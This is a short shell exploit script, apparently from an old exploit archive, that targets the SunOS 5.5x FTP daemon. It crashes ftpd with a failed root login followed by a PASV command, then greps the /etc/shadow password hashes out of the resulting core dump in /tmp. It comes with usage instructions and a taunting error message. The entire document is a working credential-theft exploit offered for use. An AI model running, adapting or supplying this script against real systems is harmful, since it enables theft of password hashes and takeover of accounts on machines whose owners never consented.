Exploit to get (at least most of) the /etc/shadow file in SunOS 5.5x.
# ftp coredumps and makes a core file in /tmp which contains the /etc/shadow
# file. Then grep takes out the shadow file and puts it in the file
# you specify (if you don't specify a dir it'll be in /tmp). 
# To Use:
# sh ftpass.sh [your username] [your passwd] [output file]
# ftpass.sh starts ftp and logs in as you and then tries to login as root, 
# using the wrong passwd and attempts to use pasv mode. This creates the
# coredump file where /etc/shadow is.
#    You can ignore the error messages.
# *********************************************************************
# Coded by TheCa
# *********************************************************************
#!/bin/sh
if [$1 = ""]; then
echo 'No you idiot! Didn't you read the file?'
echo 'type: sh ftpass.sh [user] [passwd] [output file]'
exit
fi
(echo; echo user $1 $2; echo cd /tmp; echo user root heha; echo quote pasv) | ftp -n 127.0.0.1
cd /tmp
grep '::' core > $3